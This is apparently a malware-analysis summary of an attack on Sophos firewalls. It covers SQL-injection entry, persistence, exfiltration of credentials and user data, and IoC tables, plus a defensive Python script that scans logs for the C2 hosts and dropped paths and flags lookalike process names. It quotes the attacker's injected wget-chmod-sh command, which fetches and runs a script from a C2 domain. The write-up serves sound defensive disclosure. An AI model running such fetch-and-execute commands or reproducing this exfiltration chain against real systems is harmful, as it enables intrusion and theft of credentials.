- An SQL injection vulnerability in some Sophos firewall products, which allowed remote code execution, was used to orchestrate a coordinated attack on Sophos and its customers.
- The attack, which used a chain of Linux shell scripts that downloaded ELF binary executable malware, was purportedly carried out to steal sensitive information from the firewall.
- The binary was capable of stealing:
  - The firewall’s license and serial number
  - Email addresses of user accounts that were stored on the device and the firewall admin’s primary email.
  - Firewall users’ names, usernames, the encrypted form of their passwords, and the salted SHA256 hash of the admin account’s password.
  - User IDs permitted to use the firewall for SSL VPN and accounts that have permission to use a “clientless” VPN connection.
- After fixing the vulnerability, Sophos shared a detailed analysis of the attack and the malware.
Initial Infection
- An attacker discovered and exploited a zero-day SQL injection remote code execution vulnerability.
- This allowed the attacker to insert the following command into a database table: ||cd /tmp/ && wget hxxps://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh||
- Once inserted, the command downloaded a shell script into the /tmp directory.
- The script then executed a series of SQL commands and dropped additional files into the virtual file system.
Execution and Defence Evasion
- The script initially ran Postgres SQL commands to modify the values of certain tables in the database.
- However, it backfired, and the attacker’s SQL command line appeared on the firewall’s admin panel.
- The x.sh script downloaded other scripts that connected to the sophosfirewallupdate[.]com command-and-control (C2) server.
- It downloaded and ran an ELF binary file, after which it deleted itself from the device filesystem.
- In the process list, the program name is cssconf.bin, which resembles the legitimate process cscconf.bin.
- While the binary was in memory, it repeated a series of tasks every 3 to 6 hours.
- It first tried to connect to 43.229.55.44.
- If that failed, it resolved the IP for sophosproductupdate[.]com to download another ELF binary, Sophos.dat.
- The other two shell scripts retrieved by the initial x.sh script act as a backup if the previous steps fail.
Persistence
- The script dropped at least two other shell scripts into the /tmp directory and modified at least one shell script that is part of the firewall’s OS to add a set of commands to the end of the script.
- This last script served as a roundabout persistence mechanism for the malware by modifying services to ensure it ran every time the firewall booted.
Exfiltration
- The ELF binary, Sophos.dat on the remote server, was saved to the filesystem as 2own.
- This binary ran operating system commands to steal data from database tables stored in the firewall.
- The malware concatenated the data to a file named Info.xg, stored temporarily on the firewall.
- The binary tried to retrieve the public IP of the firewall using ipconfig.me; if that failed, it queried checkip.dyndns.org.
- It then queried data storage areas on the firewall to acquire information about the firewall and its users. This included the IP address allocation permissions, the OS version, CPU type, amount of memory, etc.
- It then compressed the information stored in Info.xg and used OpenSSL to encrypt the archive file.
- The encrypted file was to be uploaded to a machine at the IP: 38.27.99.69.
- The malware finally cleaned up its tracks by deleting the files temporarily created to collect information.
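The lookalike process name (cssconf.bin imitating cscconf.bin) and the C2 hosts and dropped paths named in the sections above give a defender two cheap checks. The following is an added example, not code from the Sophos analysis: the log lines are constructed, and the baseline of legitimate process names is an assumption containing only the one name the write-up mentions.

```python
import re

# Indicators quoted from the write-up above (de-fanged there as name[.]com).
C2_HOSTS = {"sophosfirewallupdate.com", "sophosproductupdate.com",
            "43.229.55.44", "38.27.99.69"}
DROPPED_PATHS = {"/tmp/x.sh", "/tmp/.n.sh", "/tmp/b", "/var/newdb/global/.post_MI"}
# Legitimate process names the malware imitated. Only cscconf.bin is named above;
# in practice this set is the appliance's baseline process list (assumption).
LEGIT_PROCESSES = {"cscconf.bin"}

# Constructed sample log lines, not taken from any real device.
SAMPLE_LOG = [
    "Apr 22 03:14:07 fw kernel: link up eth0",
    "Apr 22 03:14:09 fw wget: resolving sophosfirewallupdate.com",
    "Apr 22 03:14:10 fw sh: executing /tmp/x.sh",
    "Apr 22 03:20:01 fw cron: session opened for root",
    "Apr 22 06:31:55 fw conntrack: new tcp 10.0.0.2 -> 38.27.99.69:443",
]

def edit_distance(a, b):
    """Optimal string alignment distance: substitution, insertion, deletion and
    adjacent transposition each cost 1, so cssconf.bin vs cscconf.bin is 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]

def lookalike_processes(process_names):
    """Return (seen, imitated) pairs for names exactly one edit from a legitimate name."""
    return [(name, legit) for name in process_names for legit in sorted(LEGIT_PROCESSES)
            if name != legit and edit_distance(name, legit) == 1]

def scan_log(lines):
    """Return (line_no, indicator) for lines containing a C2 host or dropped path;
    the lookahead stops /tmp/b from matching /tmp/bin."""
    patterns = {ioc: re.compile(re.escape(ioc) + r"(?![\w.-])")
                for ioc in sorted(C2_HOSTS | DROPPED_PATHS)}
    return [(n, ioc) for n, line in enumerate(lines, 1)
            for ioc, pat in patterns.items() if pat.search(line)]

if __name__ == "__main__":
    print(lookalike_processes(["sshd", "cscconf.bin", "cssconf.bin"]))
    print(scan_log(SAMPLE_LOG))
```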
Indicators of Compromise
File Indicators

| File name | SHA256 | File Type | Functionality |
|---|---|---|---|
| Install.sh [/tmp/x.sh] | 736da16da96222d3dfbb864376cafd58239344b536c75841805c661f220072e5 | Bash shell script | Main install script. Compromised firewall settings, dropped two files and modified a third. |
| lc [/tmp/.n.sh] | a226c6a641291ef2916118b048d508554afe0966974c5ca241619e8a375b8c6b | Bash shell script | Downloaded lp (ELF dropper) |
| bk [/var/newdb/global/.post_MI] | 4de3258ebba1ef3638642a011020a004b4cd4dbe8cd42613e24edf37e6cf9d71 | ELF x86 binary | Downloaded patch.sh |
| lp [/tmp/b] | 9650563aa660ccbfd91c0efc2318cf98bfe9092b4a2abcd98c7fc44aad265fda | ELF x86 binary | Main dropper. Downloaded 2own (data exfiltration) module |
| in.s_h | 8e9965c2bb0964fde7c1aa0e8b5d74158e37443d857fc227c1883aa74858e985 | Bash shell script | Slightly modified form of install.sh |
| 2own | 31e43ecd203860ba208c668a0e881a260ceb24cb1025262d42e03209aed77fe4 | ELF x86 script | Data theft module. Exfiltrates to 38.27.99.69 |
Network Indicators

| URLs | Domains | IPs | File System Pathways |
|---|---|---|---|